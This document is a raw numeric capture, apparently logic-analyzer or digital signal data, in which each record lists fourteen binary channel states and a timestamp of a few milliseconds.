0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2797080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2797320e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2797560e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2797840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2798080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2798360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2798600e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2798840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2799080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2799320e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2799560e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2799840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2800080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2800400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2800680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2800920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2801160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2801400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2801640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2801920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2802160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2802440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2802680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2802920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2803160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2803400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2803640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2803920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2804160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2804440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2804680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2804920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2805160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2805400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2805640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2805920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2806160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2806440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2806680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2806920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2807160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2807400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2807640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2807920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2808160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2808440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2808680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2808920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2809160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2809400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2809640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2809920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2810160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2810440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2810680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2810920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2811160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2811400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2811640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2811920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2812160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2812440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2812680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2812920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2813160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2813400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2813640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2813920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2814160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2814440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2814680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2814920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2815160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2815400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2815640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2815920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2816160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2816440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2816720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2816960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2817240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2817480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2817720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2817960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2818200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2818440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2818720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2818960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2819240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2819480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2819720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2819960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2820200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2820440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2820720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2820960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2821240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2821480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2821720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2821960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2822200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2822440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2822720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2822960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2823240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2823480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2823720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2823960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2824200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2824440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2824720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2824960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2825240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2825480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2825720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2825960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2826200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2826440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2826720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2826960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2827240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2827480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2827720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2827960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2828200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2828440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2828720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2828960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2829240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2829480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2829720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2829960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2830200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2830440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2830720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2830960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2831240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2831480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2831720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2831960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2832200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2832440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2832720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2832960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2833240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2833480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2833720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4082000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4084040e-03 1,0,0,1,1,0,0,0,0,0,0,1,0,1,5.4084360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4084600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4087560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4087800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4088040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4088320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4088520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4088800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4089040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4089320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4089560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.4089800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,5.4090040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4090320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4090520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4090800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4091040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4091320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4091560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4091800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4092040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4092320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4092520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4092800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4093040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4093280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4093560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4093800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4094040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4094280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4094520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4094760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4095040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4095320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4095560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4095800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4096040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4096280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4096520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4096800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4097040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4097320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4097560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4097800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4098040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4098280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4098520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4098800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4099040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4099320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4099560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4099800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4100040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4100280e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4100360e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,5.4100800e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4101040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4101120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4101320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4101560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4101760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4102040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4102280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4102520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4102800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4103040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4103320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4103560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4104040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4104280e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4104360e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,5.4104520e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4104800e-03 1,0,0,1,1,1,0,0,0,0,0,0,0,0,5.4104840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4104880e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4105040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4105280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4105560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4105760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4106040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4106280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4106520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4106800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4107040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4107320e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4107560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4107760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4108040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4108280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4108520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4108760e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4108840e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,5.4109320e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4109560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4109640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4109800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4110040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4110280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4110520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4110760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4111040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4111320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4111560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4111760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4112040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4112280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4112520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4112760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4113040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4113320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4113560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4114040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4114280e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4114360e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,5.4114520e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4114760e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,5.4115320e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,5.4115560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4115640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4115800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4116040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4116280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4116520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4116760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4117040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4117320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4117560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4117760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4118040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4118280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4118520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4118760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4119040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4119320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4119560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4119800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4120120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4120320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4120560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4120840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4121080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4121320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4121560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4121800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4122040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4122320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4122560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4122840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4123080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4123320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4123560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4123800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4124040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4124320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4124560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4124840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4125080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4125320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4125560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4125800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4126040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4126320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4126560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4126840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4127080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4127360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4127640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4127880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4128120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4128360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4128600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4128840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4129120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4129360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4129640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4129880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4130120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4130360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4130600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4130840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4131120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4131360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4131640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4131880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4132120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4132360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4132600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4132840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4133120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4133360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4133640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4133880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4134120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4134360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4134600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4134840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4135120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4135360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4135640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4135880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4136120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4136360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4136600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4136840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4137120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4137360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4137640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4137880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4138120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4138360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4138600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4138840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4139120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4139360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4139640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4139880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4140120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4140360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4140600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4140840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4141120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4141360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4141640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4141880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4142120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4142360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4142600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4142840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4143120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4143360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4143640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4143880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4144120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4144360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4144600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4144840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4145120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4145360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4145640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4145880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4146120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4146360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4146600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4146840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4147120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4147360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4147640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4147880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4148120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4148360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4148600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4148840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4149120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4149360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4149640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4149880e-03 